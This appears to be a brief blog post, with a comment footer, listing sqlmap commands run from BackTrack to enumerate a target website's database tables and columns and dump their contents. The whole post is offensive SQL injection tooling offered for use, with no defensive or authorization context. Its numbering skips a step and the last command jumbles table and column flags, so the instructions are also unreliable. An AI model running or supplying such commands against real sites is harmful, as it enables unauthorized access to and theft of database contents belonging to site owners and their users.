cd /pentest/database/sqlmap
Or
Go To Applications>BackTrack>Exploitation Tools>DataBase Exploitation Tools>MySQL Exploitation Tools>sqlmap
[2] : python sqlmap.py -u "website" -D "database name" --tables
[3] : python sqlmap.py -u "website " -T "table name" --columns
[4] : python sqlmap.py -u "website " -T columns name -U test --dump
0 comments:
Post a Comment